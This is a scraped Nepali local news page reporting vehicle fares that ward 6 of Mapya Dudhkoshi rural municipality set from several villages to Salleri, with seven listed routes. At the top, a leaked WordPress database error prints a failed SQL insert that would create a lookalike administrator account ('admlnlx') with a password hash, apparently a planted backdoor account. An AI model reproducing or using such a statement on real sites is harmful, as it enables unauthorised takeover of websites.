WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BS6TBqrrPtYw1YmbUsLJ2nC06Qzsdg/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 19:47:13', '', 'admlnlx', 'admlnlx')
माप्य दुधकोशी गाउँपालिका ६ नम्बर वडाले आफ्नो वडाको विभिन्न स्थानबाट सदरमुका सल्लेरी सम्मको गाडिभाडा निर्धारण गरेको छ ।
आज माप्य दुधकोशी गाउँपालिका ६ न वडा कार्यलयमा यातायत ब्याबसायी, वडाका प्रतिनिधी, समाजका अगुवाईको भेला गरि उक्त गाडिभाडदर निर्धारण गरेको वडाअध्यक्ष रामप्रसाद मगरले जानकारी गरे ।
आज निर्धारण गरेको गाडिभाडादर
१. सल्लेरी-वाकु (दिम्कु, शिराण, फापरे, चोच्मी रु. १०००/- एक हजार
२. सल्लेरी-वप्सा (खानीगाउँ, मेस्दी) रु. १२००/- बाह्रसय
३. सल्लेरी- वप्सा (लवदा, खिरु) रु. १३००/- तेह्रसय
४. सल्लेरी- दिमरा, चोपु रु ११००/- एघारसय
५. सल्लेरी- झुम्काई, इन्दोक रु. १३००/- तेह्रसय
६. सल्लेरी-डाडाखर्क रु. १२००/- बाह्रसय
७. वाकु-गाउँपालिका रु. १०००/- एकहजार